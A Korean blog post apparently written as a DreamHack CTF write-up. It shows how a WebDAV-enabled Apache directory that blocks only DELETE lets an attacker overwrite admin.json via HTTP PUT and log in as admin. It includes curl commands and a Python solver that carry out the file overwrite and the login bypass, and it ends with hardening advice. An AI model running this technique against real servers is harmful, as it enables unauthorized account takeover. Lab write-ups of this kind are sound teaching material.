[🥉 Bronze 1] SQL인 척하는 JSON, 진짜 구멍은 WebDAV PUT — DreamHack Really Not SQL 풀이

문제: DreamHack — Really Not SQL 분류: Web 난이도: 🥉 Bronze 1 FLAG: DH{un5AfE_Http_M37hod_coNfig_X.X:V65g8/eCgx2C2XzZbHrWAg==}

문제 개요

항목	내용
문제명	Really Not SQL
난이도	🥉 Bronze 1
분류	Web (PHP + Apache, JSON 파일 유저 저장소)
제공 파일 / 서버	`.php`, `user/.json`, Apache 설정 / `http://<instance-host>:<port>/` (인스턴스마다 변경)
핵심 취약점 / 기법	WebDAV(mod_dav) PUT으로 user JSON 파일 덮어쓰기 → 인증 우회

"Really not SQL, Just JSON." 이름은 SQL 인젝션을 떠올리게 하지만 DB는 없다. 유저 정보는 user/admin.json, user/guest.json 같은 JSON 파일에 들어있고 로그인은 그 파일을 읽어 비밀번호를 비교한다.

flag는 admin 세션일 때만 나온다. 나는 admin 비밀번호를 모른다. 그러니 "어떻게 admin이 되느냐"가 전부다. 답은 SQL도 JSON 파싱 버그도 아니고, Apache가 그 JSON 파일을 쓰게 열어둔 데 있다.

메인 페이지 — Login / Edit Profile

🔬 분석 — 로그인은 JSON 파일을 읽을 뿐

login.php는 이렇게 동작한다.

$username = $_POST['username'] ?? '';
$filepath = __DIR__ . '/user/' . $username . '.json';
 
if ($username !== "admin" && $username !== "guest") {
    $error = "User not found";                 // admin/guest 만 허용 (strict)
} else {
    $userData = json_decode(file_get_contents($filepath), true);
    if ($userData['id'] !== $username) { $error = "Error occured"; }
    else if ($userData['password'] !== hash("sha256", $password)) { $error = "Invalid password"; }
    else { $_SESSION['user'] = $username; }     // 로그인 성공
}

username은 admin/guest로 엄격히 제한돼 경로 조작은 안 된다. guest.json의 해시는 sha256("guest")와 일치하니 guest로는 로그인된다. 하지만 flag는 admin이어야 한다.

flag.php의 문은 하나뿐이다.

if ($_SESSION['user'] !== "admin") { http_response_code(403); }
else { echo trim(file_get_contents('/flag')); }

edit_profile.php가 비밀번호를 바꿔주긴 하는데, 그 기능 자체가 $_SESSION['user'] === "admin"을 요구한다. admin이 되려면 edit_profile이 필요하고 edit_profile을 쓰려면 admin이어야 하는, 닫힌 고리다. 로그인·프로필 수정 어느 쪽으로도 admin 비밀번호 없이는 들어갈 수 없다.

여기서 멈추면 안 되고, JSON "파일"을 누가 어떻게 다루는지를 봐야 한다.

# 000-default.conf
<Directory /var/www/html/user/>
    DAV On
    Options Indexes
    AllowOverride All
    Require all granted
</Directory>

# user/.htaccess
<Limit DELETE>
        Require all denied
</Limit>

user/ 디렉터리에 DAV On — WebDAV가 켜져 있다 (Dockerfile에도 a2enmod dav, dav_fs). 게다가 이 디렉터리는 chmod 777, JSON 파일은 chmod 666이라 Apache가 마음대로 쓸 수 있다.

방어라곤 .htaccess의 <Limit DELETE> 하나뿐인데, 막은 건 DELETE 뿐이다. PUT은 손도 안 댔다. JSON 유저 파일을 HTTP로 직접 덮어쓸 수 있다는 뜻이다.

/user/admin.json — 유저 레코드가 HTTP로 그대로 읽힌다

OPTIONS로 물어보면 PUT이 살아있는 게 바로 보인다.

$ curl -i -X OPTIONS http://<host>:<port>/user/admin.json
DAV: 1,2
Allow: OPTIONS,GET,HEAD,POST,DELETE,TRACE,PROPFIND,PROPPATCH,COPY,MOVE,PUT,LOCK,UNLOCK

💣 핵심 — PUT으로 admin.json을 통째로 갈아끼운다

로그인은 admin.json의 password 필드를 sha256(입력)과 비교할 뿐이다. 그 파일을 내가 쓸 수 있으면, password를 내가 아는 값의 해시로 바꿔버리면 된다. id만 admin으로 유지하면 로그인 검사를 그대로 통과한다.

# 1) admin.json 을 내가 정한 비밀번호(pwned_by_zino)의 sha256 으로 덮어쓰기
curl -X PUT http://<host>:<port>/user/admin.json \
  -d '{"no":0,"id":"admin","password":"4d4cfe325598b398bd0df0ae08ba77dfba7c53656b60d7e3adc13bb83c539b73"}'
 
# 2) 바뀐 비밀번호로 admin 로그인 → 세션 쿠키 저장
curl -i -X POST http://<host>:<port>/login.php \
  -d 'username=admin&password=pwned_by_zino' -c cookie.txt
 
# 3) admin 세션으로 flag.php
curl http://<host>:<port>/flag.php -b cookie.txt

4d4cfe32…는 sha256("pwned_by_zino")다. 비밀번호는 아무거나 골라도 되고, 해시만 맞춰 넣으면 그게 새 admin 비밀번호가 된다.

🚀 Full Exploit

PUT → 로그인 → flag를 한 번에 묶은 솔버다.

#!/usr/bin/env python3
import hashlib, json, requests
 
BASE = "http://host8.dreamhack.games:14965"
 
NEW_PW = "pwned_by_zino"
pw_hash = hashlib.sha256(NEW_PW.encode()).hexdigest()
new_admin = {"no": 0, "id": "admin", "password": pw_hash}   # id 는 admin 유지
 
s = requests.Session()
 
# 1) WebDAV PUT 으로 admin.json 덮어쓰기 (.htaccess 는 DELETE 만 차단)
r = s.put(f"{BASE}/user/admin.json", data=json.dumps(new_admin), timeout=15)
print(f"[*] PUT admin.json ->

[*] PUT admin.json -> 204
[*] login as admin: 성공
[+] FLAG: DH{un5AfE_Http_M37hod_coNfig_X.X:V65g8/eCgx2C2XzZbHrWAg==}

solve.py 실행 — PUT 덮어쓰기 후 admin 로그인, flag 획득

DH{un5AfE_Http_M37hod_coNfig_X.X:V65g8/eCgx2C2XzZbHrWAg==}

📝 정리

이름에 끌려다니지 않는다.

"Really Not SQL"은 SQL을 들여다보게 만드는 미끼다. 정작 구멍은 인증 로직이 아니라 그걸 떠받치는 파일을 누가 쓸 수 있느냐에 있었다. 코드만 보지 말고 그 코드가 만지는 자원의 권한과 서버 설정까지 같이 봐야 한다.

WebDAV는 읽기 서버가 아니라 쓰기 서버다.

DAV On 한 줄이면 그 디렉터리는 PUT/COPY/MOVE로 파일을 만들고 바꿀 수 있는 공간이 된다. 정적 파일 디렉터리에 무심코 켜두면, 그 안의 파일이 곧 공격자의 입력이 된다.

거부 목록은 빠뜨린 것만큼 위험하다.

.htaccess는 DELETE를 정성껏 막았지만 PUT은 잊었다. 위험한 메서드를 하나씩 막는 블랙리스트는 이렇게 한 칸만 비어도 뚫린다. 필요한 메서드만 허용하는 화이트리스트가 안전하다. 플래그의 un5AfE_Http_M37hod_coNfig가 그대로 답이다.

[🥉 Bronze 1] SQL인 척하는 JSON, 진짜 구멍은 WebDAV PUT — DreamHack Really Not SQL 풀이

댓글

관련 글

[🌱 Sprout] 기본 자격증명으로 설정값 읽기 — DreamHack web-misconf-1 풀이

[🥈 Silver 4] UNION으로 진짜 테이블을 찾아내는 SQL Injection — DreamHack baby-union 풀이

[🥉 Bronze 2] GET만 열어둔 Flask 라우트를 HEAD로 뚫기 — DreamHack blind-command 풀이

문제 개요

🔬 분석 — 로그인은 JSON 파일을 읽을 뿐

💣 핵심 — PUT으로 admin.json을 통째로 갈아끼운다

🚀 Full Exploit

📝 정리